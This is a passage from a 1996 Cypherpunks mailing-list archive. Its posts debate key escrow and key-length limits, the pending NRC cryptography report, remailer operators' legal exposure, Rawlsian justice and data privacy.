the level of information that you give out by accident or for the sake of
convenience - e.g., credit cards.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 25 May 1996 18:53:29 +0800
To: cypherpunks@toad.com
Subject: Re: why is no one (apparently) worried about escrowed key length limits?
Message-ID: <199605250733.AAA27259@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua and several others have asked things like:
>It appears that (from the responses I have gotten on why there are key
>length limits at all on escrowed encryption) I am not forgetting
>anything obvious.
>So why is no one seriously questioning why this limit has to be there
>for key escrow?
>One suggestion was: the NSA does not completely trust key escrow.  But
>if the NSA (who should know all the inner secrets of it) cannot
>completely trust key escrow, then why should WE trust key escrow?

What the NSA can't trust isn't the key escrow itself - it's the ability
of applications to work around the key escrow, so they get decent
encryption without escrow.  They also can't 100% trust escrow agents;
maybe Cosa Nostra Key Escrow has an "accidental" disk crash that
wipes out 5% of their clients' keys one week, and discovers that
the backup tapes can't be read.  Or terrorists who've been using 
Uncle Sam's Nephew Fred Key Escrow make him an offer he can't refuse,
just as the FBI is closing in on the terrorist ring.  It's for your
own protection, after all!  So they need to be able to crack it,
just in case.

Alternatively, they really Just Don't Get It.  Or they hope that industry
will get tired of arguing, and take the deal in return for export permission,
figuring that they've got the upper hand so they don't need to fold early,
while more and more vendors succumb to FUD and make deals like Lotus.

<cynicism-mode +3> Or they _know_ that nobody likes it, and industry
will refuse to cooperate yet again, so they'll go to Congress saying
"OK, we've given the industry three _perfectly reasonable_ choices,
and they're too stubborn and hostile to cooperate, so it's time to
stop playing around and just make a new law whether they like it or not."

#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 25 May 1996 19:42:57 +0800
To: cypherpunks@toad.com
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <199605250823.BAA27934@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:52 PM 5/24/96 -0500, snow <snow@smoke.suba.com> wrote:
>> > Don't suppose Matt could do a little executive summary of 
>> > "The Briefing" and post it to the list, could he?
>> Probably not unless he wanted to do time.
>> I suspect some anonymous person might put bamboo shoots under his
>> fingernails and post the results of the interrogation however.
>
>	Isn't this exactly what the anon remailers were designed for?

It's also what Canary Traps were designed for.
Are the "secrets" they told Matt the same as the ones they told Dorothy?
Not likely....
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Sat, 25 May 1996 22:59:55 +0800
To: cypherpunks@toad.com
Subject: Re: Children's Privacy Act
Message-ID: <2.2.32.19960525115008.006ed084@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:34 PM 5/24/96 -0700, tcmay@got.net (Timothy C. May) wrote:

>If I have compiled records, dossiers, etc., as I most assuredly have (got
>to fill up those MO disks with something), this is "my" information. Mine
>in the sense that others can't dictate to me what I do with it.

I don't see that this is necessarily true for information any more than it
is property. Property can be bought, sold, traded, given away, made...but it
can also be stolen. Just as I have a right to complain if you walk off with
my couch without my permission, so if you walk off with data on my blood
chemistry or credit history without my permission.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Mon, 27 May 1996 04:43:10 +0800
To: cypherpunks@toad.com
Subject: Re: [SCARE]: "If you only knew what we know..."
Message-ID: <199605251528.IAA15783@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



I asked Peter Neumann, of the NRC commission whose report is due
very very soon, and they did indeed get "The Briefing".  He was
very keen to have all appendices of the final report be public,
we may get to see the story there.

I am just on pins and needles waiting for the report.  I thought,
when it was announced, that in the year-and-a-half that it would take
to write that the war would be won.  It hasn't, of course.  I think
that the NRC report will define the landscape of the debate for the
next year or so.  We'll see.

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Visual Effects Supervisor                408) 286-3376
   Hammerhead Productions        http://www.got.net/~thad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 27 May 1996 06:00:32 +0800
To: cypherpunks@toad.com
Subject: The Report -- The Day the Earth Stood Still
Message-ID: <adcc7e7108021004f0d8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


"Just 15 more days until the NRC report is released...."

"Only 12 days until we release the NRC report...."

"Since there are only 8 days left, you might want to place your order for
the NRC report now..."

"Only 7 more days..."

Personally, I think we're getting entirely too many update reports on when
The Report is coming. Just release the damned thing, so we can reject it
forthwith.

(If it needs being rejected....)

At 3:28 PM 5/25/96, Thaddeus J. Beier wrote:
>I asked Peter Neumann, of the NRC commission whose report is due
>very very soon, and they did indeed get "The Briefing".  He was
>very keen to have all appendices of the final report be public,
>we may get to see the story there.
>
>I am just on pins and needles waiting for the report.  I thought,
>when it was announced, that in the year-and-a-half that it would take
>to write that the war would be won.  It hasn't, of course.  I think
>that the NRC report will define the landscape of the debate for the
>next year or so.  We'll see.


It's risky for me to even speculate what's in this report, but a look at
who's on the panel raises my eyebrows. (Many of the panel members were at
the CFP '95, in San Francisco, and listened to public input from a crowd of
agitated Cypherpunks and others. From their questions, many of them were
clearly skeptical of the views expressed from the floor. Some of them
couched their points in terms of that magic code phrase, "the legitimate
needs of law enforcement," so draw your own conclusions.)

Maybe their report will call for unlimited strength crypto to be freely
available to all citizens (as it is now, legally), free export of said
crypto (as it not now), no restrictions on digital money, and no mention of
"key escrow" whatsoever (as there should not be, as "key escrow" is not an
issue for governments to get involved in).

Maybe.

But color me a bit skeptical, given their inside-the-Beltway focus.

And don't forget that Ray Ozzie, the esteemed developer of Lotus Notes
(Iris Associates, connected with Lotus, and now IBM), is on the panel. He
got all the various briefings, I presume. His response? Don't forget that
he announced that Lotus Notes and such products would implement the "40 +
24 Solution," with 24 bits of a 64-bit key given to the government, leaving
users with a trivially-crackable 40-bit key.

This from one of the most technically-up-to-date members of the panel....

I'm holding my breath....

"Remember, there are only 5 days left until the release of The Report. Set
your watches, program your Newtons, and plan your affairs accordingly."


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 27 May 1996 05:41:46 +0800
To: cypherpunks@toad.com
Subject: The Report -- The Day the Earth Stood Still
Message-ID: <adcc84f60902100478e9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I wrote:

"And don't forget that Ray Ozzie, the esteemed developer of Lotus Notes
(Iris Associates, connected with Lotus, and now IBM), is on the panel. He
got all the various briefings, I presume. His response? Don't forget that
he announced that Lotus Notes and such products would implement the "40 +
24 Solution," with 24 bits of a 64-bit key given to the government, leaving
users with a trivially-crackable 40-bit key."

Just to clarify this a bit, this was for the export versions of the
products, not the domestic versions. (Most such restrictions have been for
export versions.)

But the point is that companies are, behind the scenes, making plans to
incorporate GAK into their products.

The list carried a long discussion of the Lotus plan, back several months
ago. (Too bad the archives are no longer available....that "several days"
mentioned in the March 18th message at the
http://www.hks.net/cpunks/index.html site sure has gotten longer.)

Only 4.8 days left until The Report is released.

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Subir Grewal <grewals@acf2.nyu.edu>
Date: Mon, 27 May 1996 04:01:18 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Rawls, was RE: Children's Privacy Act.
In-Reply-To: <01I53P6L2ZIQ8Y4ZAY@mbcl.rutgers.edu>
Message-ID: <Pine.ULT.3.92.960525095622.14671C-100000@acf2.NYU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 24 May 1996, E. ALLEN SMITH wrote:

:	Most arguments on fairness ultimately come down to either appeals to
:gut instincts - not a valid argument - or philosophical ones, generally
:Rawls' Theory of Justice. That one has a problem. Rawls thought that the
:most just social system was that which a group of people would come up with
:when they didn't know what position they'd be in. This would lead to equality,
:since nobody'd want to be in the low position, right? Wrong. People can
:rationally take a chance. If you give someone a choice between gambling for
:(on the flip of a 50/50 coin) 150 or 0 dollars, and getting 50 dollars
:guaranteed, the rational choice is the gamble. In other words, if it is more
:efficient - as I have argued - for things to be unequal, then this idea of
:what justice is would argue for inequality being just.

I don't think that is exactly what Rawls was postulating (though I would
be the first to agree that Rawls' prose is exceptionally interpretable,
which I belive is a point in Rawls favour as a writer).  Rawlsian "Justice
as fairness" is based on the idea that a just system is one in which
people decide rules before they know what their starting positions are.
In a sense this is only taking the idea of a "disinterested/impartial
lawmaker" and putting it into another context.  What is perhaps more
fundamentally important about Rawls is his profound respect for contract
and expectations engendered by the contract, as evidenced in his argument
for the rules being laid down befor eht egame (in this case life as we
know it) begins.  I think this is why Hayek felt "A theory of Justice" was
not the text others thought it was (I haven't read Nozick's Anarchy, State
and Utopia as of yet, only bits of it).  In any case, I don't
really believe Rawls argued for an egalitarian system.  The two "rules" he
thinks will emerge from the "initial position behind the veil of
ignorance" are (pg. 60)

First; each person is to have an equal right to the most extensive basic
liberty compatible with a similar liberty for others.
Second: social and economic inequalities are to be arranged so that they
are both a) reasonably expected to be to everyone's advantage, and b)
attached to positions and offices open to all.

He goes on to say "While the distribution of wealth and income need not be
equal, it must be to everyone's advantage, and at the same time, positions
of authority and offices of command must be accessible to all.  .... These
principles are to be arranged in a serial order with the first principle
prior to the second.  This ordering means that a departure from the
institutions of equal liberty required by the first principle cannot be
justified by, or compensated for, by greater social and economic
advantages".   He then adds to the argument the concept of the difference
principle (pareto optimality in the final reckoning) and maximin
(maximizing the expectations/outcome of the person at the lowest rung of
the ladder).  About the difference principle Rawls says " it should be
observed that the difference principle, or the ideas expressed by it, can
easily be accomodated to the general conception of justice.  In fact, the
general conception is simply the difference principle applied to all
primary goods including liberty and opportunity".

I really don't see Rawls arguing strict egalitarianism in "A theory of
Justice".  Further, I believe the most important contribution made by this
book is the principle of the "veil of ignorance / initial position" as a
test for the fariness/justice of a particular system.  Rawls proposal is
simply his idea of what would result from the initial position (as you
poit out) and certainly we can come up with other equally acceptable
proposals.  But it is essential to read Rawls because he is so
interpretable, my own reading may be flawed.  In any case, Rawls is well
aware of the demands efficiency places on an egalitarian system (which it
is unable to meet) and does agree that inequality can be in everyone's
interest (i.e. spill-over's, for eg. because geniuses need incentives as
well as does the company that brings you your breakfast cereal).  As a
final quip, the result (in any particular game) of the question regarding
the gamble you proposed earlier depends almost entirely on the player's
aversion to risk.  Some among us (I'm sure) would be willing to take $50
in hand rather than $2million in the bush ;~)

hostmaster@trill-home.com * Symbiant test coaching * Blue-Ribbon * Lynx 2.5
WHERE CAN THE MATTER BE

	Oh, dear, where can the matter be
	When it's converted to energy?
	There is a slight loss of parity.
	Johnny's so long at the fair.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Key Escrow = Conscription for the masses | 2048 bit via finger

iQB1AwUBMacYMRwDKqi8Iu65AQGsuAL+OVORTCAedDLFaG4WqrUow2Ytx5CE8/vU
X8KO6D7f8G5uUTi5yEKxz+rrx3mOVg7lyLyqA0a05CbZfiUnoSuAXxKkFihST8xi
JM2xWsngdyG0ZbEtV85+3TASBRvXP8rR
=Ebe4
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 27 May 1996 02:58:20 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers - What exists?
In-Reply-To: <m0uNImK-00009rC@ulf.mali.sub.org>
Message-ID: <V9mHoD91w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


um@c2.org (Ulf Moeller) writes:

> >Which remailers can be run best on the most systems?
>
> I guess Mixmaster wins in all categories.

Does it mean it runs on NT or W95 or OS/2 or Mac or VAX/VMS?

(E-mail me for the Usenet cancelbot that does :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 27 May 1996 05:42:07 +0800
To: Simon Spero <tcmay@got.net>
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <199605251729.KAA25537@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:31 PM 5/23/96 -0400, Simon Spero wrote:
> If I were planning such a briefing I'd probably concentrate on real cases 
> that were cracked due to NSA SIGINT - especially terrorist groups 
> operating with only limited state sponsorship

This assumes that such cases actually exist.  I imagine if 
such a thing ever happened, the NSA would shout it from the 
rooftops for the next three hundred years.

Recollect that the trade tower bombers were caught because 
they were unclear on the concept of a deposit.  Whenever 
terrorists are busted, nobody makes any big secret of how 
they were busted.  On the contrary, the newspaper reporters 
are in danger of being trampled in the rush to take credit.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 27 May 1996 06:15:03 +0800
To: Rich Graves <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Children's Privacy Act
Message-ID: <199605251729.KAA25539@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>On Fri, 24 May 1996, E. ALLEN SMITH wrote:
>> 	Why, pray tell, _should_ someone be able to conceal that they declared
>> bankrupcy - e.g., ran out on their debtors that they had freely contracted to
>> repay - more than 7 years ago? Should prison terms to theft be limited to 7
>> years?

At 06:36 PM 5/24/96 -0700, Rich Graves wrote:
> I think forgiveness, within reason, tends to have a positive economic
> effect. 

Government compelled forgiveness does not have a positive economic affect, 
and if it did it would still be wrong.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 27 May 1996 03:45:55 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <01I53PQSSUL88Y4ZAY@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960525102937.4595D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 25 May 1996, E. ALLEN SMITH wrote:

> From:	IN%"unicorn@schloss.li"  "Black Unicorn" 24-MAY-1996 22:52:03.64
> 
> >Remailers on the attack points (first in chain, last in chain) simply MUST
> >be disposable as tissue.  They must be run as anonymously as possible,
> >with as little connection to the ISP's assets as possible and immediately
> >disposable.  They must be easy to set up, runable without root and there
> >must be a much more efficent tracking mechanism.  (Mr. Levin has done a
> >terrific job, but even more needs to be done).
> 
> 	Why the first in chain? If the anti-traffic-analysis provisions are
> working properly, it should be impossible to prove that a given first remailer
> was the first remailer for any particular message.

Unless said message was sent only through one remailer.

In this case the remailer operator is very vulnerable to the problems we
have been discussing.

> >It only takes ONE operator to get a tiny ($2500-$10,000) fine or judgement
> >and that will be the end of most of the mailers.  Poof.
> 
> 	What, pray tell, is the result of a judgement in which the person
> manifestedly doesn't have the money to pay? I couldn't pay a 10,000 dollar
> judgement; I don't have that much money. I would guess it'd be some form
> of attachment of income; this wouldn't get them much...

Garnishment, attachment of assets, perhaps forcing you into bankrupcy.

Not pretty.

> >In my view trying to balance bias rather than eliminate it is much more
> >effective.
> 
> 	Modification of jury selection? Removal of some of the preemptory
> challenges? Hmm... some challenges are for cause, as I recall. Unless it's
> a particulary egregious case of such, I'd suggest allowing the other side to
> override such with expenditure of a preemptory challenge.

No, I mean that the selection process would be from a pool of experts on
the issues involved.  This is done in many European systems.

We should take this to e-mail.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 27 May 1996 06:33:12 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: An alternative to remailer shutdowns
Message-ID: <199605251737.KAA26055@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:10 AM 5/25/96 EDT, E. ALLEN SMITH wrote:
>From:	IN%"unicorn@schloss.li"  "Black Unicorn" 24-MAY-1996 22:52:03.64
>
>>Remailers on the attack points (first in chain, last in chain) simply MUST
>>be disposable as tissue.  They must be run as anonymously as possible,
>>with as little connection to the ISP's assets as possible and immediately
>>disposable.  They must be easy to set up, runable without root and there
>>must be a much more efficent tracking mechanism.  (Mr. Levin has done a
>>terrific job, but even more needs to be done).
>
>	Why the first in chain? If the anti-traffic-analysis provisions are
>working properly, it should be impossible to prove that a given first remailer
>was the first remailer for any particular message. I had thought that even
>civil courts required that you be the person who committed some act, not the
>person who _might_ have committed some act. Otherwise, all the remailers are
>in danger. This is even if someone tries an entrapment by sending through some
>illegal material - if the courts accept that they should be allowed to do this,
>then all the remailers they chained are going to be hit.

Likewise, I don't see why the first address in the chain is vulnerable, as 
long as the message subsequently passes through at least one trustworthy 
remailer, and probably  a temporary output address.  



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Mon, 27 May 1996 03:56:40 +0800
To: Ernest Hua <hua@XENON.chromatic.com>
Subject: Re: why is no one (apparently) worried about escrowed key length limits?
In-Reply-To: <199605241756.KAA07067@ohio.chromatic.com>
Message-ID: <Pine.SUN.3.91.960525103410.25510A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, Ernest Hua wrote:

> Obviously, the implication is that brute force (or "near brute force")
> methods WILL be used against encrypted transactions.  So in the best
> case, there is some lower strata of law enforcement who are only
> allowed to use the escrowed path to intercept, but there is also some
> upper strata of law enforcement (presumably some anti-terrorist or
> national security section of ATF or FBI or CIA or Secret Service) who
> will be allowed to use such super-duper cracking methods to achieve
> their goals (assuming their goals are good).

This is hardly questionable as the reason for restricted key lengths; if 
this wasn't the fact of the matter, they wouldn't make it difficult to 
superencrypt with the same system over and over again, which they do.
And "best" case for who?  Not I, surely. Simply putting a "national 
security" clause in this makes the CIA or SS or FBI or ATF or whatever 
above the law, regardless of the reasons.  I certainly don't want these 
organizations above the law.  I remember (well, not really.  But I've 
read about) J Edgar Hoover, and I don't want a repeat.

> But, if the best case happens, then we're all Ozzie and Harriet (or
> Archie and Edith), and we should be in a love fest with the
> government.  Obviously we don't competely and blindly trust our
> government.

Archie didn't completely and blindly trust the government. Ozzie and 
Harriet, yes. Edith, probably.  Archie, no.  (ObGunPunks: remember the 
episode where Archie got to do the TV editorial about gun control? :-))

Jon
----------
Jon Lasser (410)532-7138                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Subir Grewal <grewals@acf2.nyu.edu>
Date: Mon, 27 May 1996 03:46:19 +0800
To: David Rosoff <drosoff@arc.unm.edu>
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <1.5.4.16.19960525030725.34bfb678@arc.unm.edu>
Message-ID: <Pine.ULT.3.92.960525102600.14671D-100000@acf2.NYU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 24 May 1996, David Rosoff wrote:

<text on the general standard of humanity using Lord of the Flies
as an illustration deleted>

I think an insight your analysis may benefit by is that certain
institutions/societal norms create incetives for "corrupt politicians".
Hayek argues against the "benevolent dictator" concept because he says no
gentle person would ever aspire to be a dictator.  The system itself calls
for people who are ruthless to take the reins.  A similar argument can be
made for the various functions of a modenr democracy (like the US).  It is
rarely that we hear of a considerate IRS auditor, or a principled
politician.  The structures themselves call for and promote those who (in
that an individual is more successful if they) are corrupt, power-hungry,
unprincipled and ruthless.

As for Assasination Politics, I can understand such proposals in jest.  I
too say things to appear controversial.  As a serious political structure,
however, it is reprehensible.  Murder cannot be condoned (as a pacifist,
the argument that politicians create wars and must be killed for that
reason does not hold much water for me) and the proponents of such systems
would do well to look more closely at the systemic ills rather than
individuals.  The argument that AP is an institutional dis-incentive for
"bad" representatives that offsets other incentives is problematic since I
do not believe the methods are just.

hostmaster@trill-home.com * Symbiant test coaching * Blue-Ribbon * Lynx 2.5
WHERE CAN THE MATTER BE

	Oh, dear, where can the matter be
	When it's converted to energy?
	There is a slight loss of parity.
	Johnny's so long at the fair.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Key Escrow = Conscription for the masses | 2048 bit via finger

iQB1AwUBMacbxRwDKqi8Iu65AQEn3AMAwCh+WWQsUrL1cnfZElzNmqexngXs4rAo
Pz4ztTXpGPLxLMAKO5qcGNmI7yT8DP1rVH21EumZG700jQ18pH/7NWQj1RnAK3ZQ
pJInW4kZ3iEjFKhCto0TzVOYEwMkZrrK
=Wlte
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 27 May 1996 05:18:37 +0800
To: cypherpunks@toad.com
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <199605250823.BAA27934@toad.com>
Message-ID: <Pine.LNX.3.93.960525105034.812A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 25 May 1996, Bill Stewart wrote:
> At 05:52 PM 5/24/96 -0500, snow <snow@smoke.suba.com> wrote:
> >> > Don't suppose Matt could do a little executive summary of 
> >> > "The Briefing" and post it to the list, could he?
> >> Probably not unless he wanted to do time.
> >> I suspect some anonymous person might put bamboo shoots under his
> >> fingernails and post the results of the interrogation however.
> >	Isn't this exactly what the anon remailers were designed for?
> It's also what Canary Traps were designed for.
> Are the "secrets" they told Matt the same as the ones they told Dorothy?
> Not likely....

	Thought about that, just couldn't remember the name of the bird.
If someone was to post a summary, leaving out specific cases, that _might_
get around it. Also, depending on exactly what was in the breifing, one
could "embellish" it a little, give cases _similar_ (i.e. made up) to give
us an idea of what goes on, but not to release specific details. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Mon, 27 May 1996 06:42:56 +0800
To: cypherpunks@toad.com
Subject: WhoWhere Robot strikes again
Message-ID: <v03006f00adccfdadcae2@[198.93.25.98]>
MIME-Version: 1.0
Content-Type: text/plain


I now have a WhoWhere Robot hitting one of my web servers from
orion.parsecweb.com and it is most assuredly not honoring the
robots.txt file regarding directories to exclude. I also just looked in
the bot registry again and the WhoWhere Robot remains unlisted.

Needless to say, I'm denying accesses from parsecweb.com from here onward.

Stephan

________________________________________________________________________
Stephan Somogyi              Central Services              Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 27 May 1996 06:36:13 +0800
To: Jim Choate <cypherpunks@toad.com
Subject: Re: PILATE SAYETH UNTO HIM... (fwd)
Message-ID: <199605251909.MAA01818@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:39 AM 5/24/96 -0500, Jim Choate wrote:
>If there was an absolute Truth as you postulate the results would 
>be many and varied. For instance,
>
>1.  If the Truth were absolute everyone would have to accept it as such
>    even if they disagreed or said it wasn't the Truth,

Only if they were infallible.

>2.  What is the litmus test for ultimate Truth? How do you tell it from
>    regular truth? How do you tell it from a lie? From the Lie?

The usual methods.

>3.  If there were a ultimate Truth then this implies that it is possible
>    to have a system which can fully describe itself. 

This is an argument against divinity, not an argument that the truth does 
not exist out there in the world and pretty well knowable most of the time.

All your arguments are just variants of the claim "Subjectivism must be 
true because it must be true", which is obviously self contradictory
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 27 May 1996 06:40:46 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: [SCARE]: "If you only knew what we know..."
In-Reply-To: <adca03eb020210043329@[205.199.118.202]>
Message-ID: <199605252014.NAA25450@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Paraphrasing the "Wired" item, "No person who has ever received "The
>Briefing" has ever again argued forcefully for the rights of citizens to
>use strong cryptography."
>
>I surmise that either Sen. Burns has not yet been given The Briefing, or he
>is for some reason more resistant than most other burrowcrats to the scare
>tactics used in The Briefing.
>
>I sure would like to know what's in this briefing.

perhaps the "four horsemen of the infocalypse" (terrorists, child
pornographers, drug dealers, money launderers) only scratches the
surface.

seriously though, it's possible to imagine some things.

1. there could be some info on how the NSA foiled various horrible
james-bond like plots for governments to destroy the world

2. information on terrorists using cryptography, to create a kind
of link in the mind of the feebleminded

3. nuclear secrets. defense secrets. information on state-of-the-art
weapons systems that are subject to spying and espionage. creating
the impression that any private crypto would tend to totally destabilize
the "stability" of the world, upheld by the NSA of course

4. another classic NSA/secret society trick is 
to say, "you are a special person. we can't
tell everyone what we are going to tell you now, but you have reached
a position wherein you have earned this privilege. you are going to
become a warrior in the fight against world tyranny. few know about 
us. we are the few, the proud."


in short, I think the Briefing probably has a lot of psychological
theater going on to create an aura of reverence even if the info
is not all that substantial. things like talking about who else
knows the info, how private it is, what the huge stakes involved
are of defying the plan, etc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 27 May 1996 06:40:20 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Cyber-Anarchy
In-Reply-To: <adcaa0e10802100413c3@[205.199.118.202]>
Message-ID: <199605252027.NAA26357@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM
>My point is actually not so much one of claiming credit for something I've
>been involved with since 1988, as being somewhat critical of the
>all-too-common tendency I see of _renaming_ something without adding any
>new content.

no, you want credit, otherwise you wouldn't care ("cyberanarchy"? how
far is that? in many ways it is more descriptive/accurate for what
is being connoted).  you get credit when people use "your" term, the
etymology you love to wax on occasionally here.

>
>Jim Bell calls his set of ideas "cyber-anarchy," and certain journalists
>have picked up on this (as with the Australian article).
>
>But with the exception of the one variant of anonymous markets, namely,
>"assassination politics," most or all of the other ideas of his
>"cyber-anarchy" seem to be encompassed by the already-existing term.

a pseudo-word that you invented. any pseudo-word is as good as any other.

I think you need to reevaluate your life when you get upset that people
don't use word you invented. for example the term "pseudospoofing"
has many applications to recent news but has never been properly used by 
journalists.  (hee, hee)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 27 May 1996 06:49:47 +0800
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: The Anti-Briefing...
In-Reply-To: <v02140b08adcb6bbc487c@[199.125.128.5]>
Message-ID: <199605252034.NAA26938@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



PW

>Some might argue that if weak crypto can save one child's life
>than it is worth it. This is a strong, sentimental argument, but
>it really doesn't reflect the reality of the tradeoff. We could
>spend a lot more money on airlines, trains and cars and save a
>few kids lives, but the cost could be phenomenal. The fact is
>that government enforced weak crypto is a tradeoff. We pay for
>the ease of the police surveillance because we make life simpler
>for crooks who make their living eavesdropping and circumventing
>security systems. The big question is whether the tradeoff is
>worth it.

I'm surprised that there hasn't been more mention of a trend
in Britain toward installing video cameras all over the place.
saw a story on this on "hard copy". apparently they don't have
"invasion of privacy" laws there, and this couple who had been
